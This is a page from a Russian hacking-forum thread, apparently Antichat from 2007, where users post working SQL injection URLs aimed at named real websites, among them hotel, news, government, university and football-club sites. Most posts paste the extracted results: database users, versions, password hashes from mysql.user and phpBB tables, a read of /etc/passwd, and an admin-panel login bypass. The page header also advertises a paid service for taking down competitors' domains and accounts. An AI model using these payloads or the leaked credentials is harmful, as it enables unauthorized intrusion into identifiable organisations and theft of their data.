Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 336 из 1242

336

Опции темы

Поиск в этой теме

Опции просмотра

#3351

20.10.2007, 00:30

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

http://www.infohotel.ru/hotel.php?district=0&subway=0&room=0&price=0&searc h=2&page=0&id=-1+union+select+1,2,3,concat(version(),0x2F,databas e(),0x2F,user())/*

5.0.27/petroholru_info/petroholru@81.177.16.81 доступ к information_schema есть. ничего толкового не нашел

http://sovetnik-n.spb.ru/shownews.php?id=-1+union+select+1,2,3,concat(version(),0x2F,databas e(),0x2F,user()),5,6,7,8,9,10/*

4.1.20/sovetnik_n/sovetnik_n@localhost

#3352

20.10.2007, 09:15

Elvis000

Moderator - Level 7

Регистрация: 23.04.2007

Сообщений: 646

Провел на форуме:
4901399

Репутация: 1035

Всероссийский туроператор свадебных путешествий

Код:

http://www.pssp.ru/services.php?s=999999999999+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(DATABASE(),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16/*

юзер:dbu_galeeva_1@192.168.3.74
база:db_galeeva_1
версия:4.1.18

#3353

20.10.2007, 10:17

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

Код:

http://geolog.mnr.gov.ru/part/?pid=-1/**/union/**/select/**/1,LOAD_FILE('/etc/passwd'),3/*

#3354

20.10.2007, 10:45

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Отправить сообщение для it's my с помощью ICQ

Код:

http://gostorgi.ru/z/tenders.php?tt=9999&rc='+union+select+1,2,user,password+from+mysql.user/*

1. root — 72f840f85cf3bb40
2. gostorgi — 72f840f85cf3bb40

#3355

20.10.2007, 12:34

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

Провел на форуме:
4608122

Репутация: 874

Отправить сообщение для Red_Red1 с помощью ICQ

2 ElteRUS
По поводу http://www.infohotel.ru
Тут есть более серьезная иньекция. http://www.infohotel.ru/admin/ в поле логин пишем 1' or 1=1/* в поле пароль любое. Мы в админке...

Цитата:

доступ к information_schema есть. ничего толкового не нашел

Незнаю как ты но я нашел таблицу spb_users, в ней поля username, password, там значения
username-admin
password-3fe4220069643d6d
Сильно подозреваю что это для входа в админку

Но ввиду 1' or 1=1/* становиться неактуальным, тем более что хеш я не расшифровал.

#3356

20.10.2007, 17:06

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

http://www.fnews.ru/archive.php?s=news&id=-1+union+select+1,2,3,4,concat(username,char(64),us er_password,0x25,user_email),6,7,8,9,10,11,12+from +phpbb_users+limit+1,1/*

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

#3357

20.10.2007, 18:43

mister

Познающий

Регистрация: 24.07.2007

Сообщений: 31

Провел на форуме:
1417840

Репутация: 35

Отправить сообщение для mister с помощью ICQ

Код:

http://www.bsu.edu.ru/utils/download.asp?idf=1+and+1=@@version--

#3358

20.10.2007, 19:27

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Код:

http://www.adamproject.net/dispositif.php?id_j=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7/*

adam@localhost:5.0.32-Debian_7etch1-log:adam

Код:

http://lesminots.com/resume0304.php?id_j=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*

ocblklesmin@10.0.64.33:5.0.26-log:ocblklesmin

Код:

http://www.bonus33.pl/oferta.php?id_z=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database())/*

poczta_bonus@localhost:5.0.33-log:poczta_bonus

Код:

http://www.tswisla.pl/wislamcarthur/inc/zawodnik.php?id_z=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10/*

5.0.24-Debian_0.dotdeb.0-log

edu

#3359

20.10.2007, 21:03

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

edu

MySQL 4.x.x.

Код:

http://spacegrant.nmsu.edu/isps/page.php?num=-6'+union+select+1,2,user(),4,5/*

MySQL 3.x.x.

Код:

http://www.auburn.edu/oit/oitnews/article.php?num=57+/*!40000+and+0+*/

Последний раз редактировалось [53x]Shadow; 21.10.2007 в 15:08.. Причина: очепятка =\

#3360

21.10.2007, 01:27

-MoLoToK-

Познающий

Регистрация: 04.10.2007

Сообщений: 32

Провел на форуме:
188171

Репутация: 88

Отправить сообщение для -MoLoToK- с помощью ICQ

ФК Химки

Код:

http://fckhimki.ru/modules/news/index.php?current_id=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

fckhimki_new1@v2.valuehost.ru
Версия 4.0.27-max-log

ФК Торпедо

Код:

http://www.torpedo.ru/gb/comments.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+news/*

Последний раз редактировалось -MoLoToK-; 21.10.2007 в 02:09..

Страница 336 из 1242

336

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход